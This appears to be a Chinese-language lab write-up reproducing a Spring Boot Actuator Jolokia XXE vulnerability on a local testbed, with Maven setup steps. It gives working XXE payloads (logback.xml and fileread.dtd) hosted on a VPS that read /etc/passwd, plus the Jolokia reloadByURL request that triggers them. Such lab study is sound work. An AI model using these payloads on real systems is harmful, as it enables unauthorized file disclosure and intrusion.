前言

刚好想到SpringBoot的漏洞，这次就来复现一下。本地环境为Kali，vps为一台华为云

环境搭建

Maven环境搭建

Maven下载

https://archive.apache.org/dist/maven/maven-3/选择合适的版本进行下载，我这里使用的是3.6.1

upload successful
Linux选择apache-maven-3.6.1-bin.tar.gz下载

wget https://archive.apache.org/dist/maven/maven-3/3.6.1/binaries/apache-maven-3.6.1-bin.tar.gz

下载后，解压

tar -xf apache-maven-3.6.1-bin.tar.gz

然后是环境的配置

mv apache-maven-3.6.1 /usr/local/maven
ln -s /usr/local/maven/bin/mvn  /usr/bin/mvn
echo " ">>/etc/profile
echo "# Made for mvn env by zhaoshuai on $(date +%F)">>/etc/profile
echo 'export MAVEN_HOME=/usr/local/maven'>>/etc/profile
echo 'export PATH=$MAVEN_HOME/bin:$PATH'>>/etc/profile
tail -4 /etc/profile
source /etc/profile
echo $PATH

最后，在终端中输入

mvn --version

出现证明安装成功
upload successful

漏洞环境搭建

GitHub地址:https://github.com/veracode-research/actuator-testbed

使用git clone或者自己下载均可，我这里选择git clone

git clone https://github.com/veracode-research/actuator-testbed

然后使用命令行切换到clone的目录

mvn install
upload successful

看见build成功后

mvn spring-boot:run

最后访问localhost:8090即可

漏洞复现

Jolokia漏洞利用

Jolokia漏洞利用(XXE)

访问/jolokia/list，查看是否存在logback库提供的reLoadByURL方法
upload successful
如果存在，创建logback.xml和fileread.dtd文件，并上传到公网Vps

logback.xml

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE a [ <!ENTITY % remote SYSTEM "http://x.x.x.x/fileread.dtd">%remote;%int;]>
<a>&trick;</a>

fileread.dtd

<!ENTITY % d SYSTEM "file:///etc/passwd">
<!ENTITY % int "<!ENTITY trick SYSTEM ':%d;'>">

将这两个文件上传到vps并开启http服务
upload successful
远程访问logback.xml文件

127.0.0.1:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/124.70.155.7!/logback.xml

upload successful
即可读到/etc/passwd的内容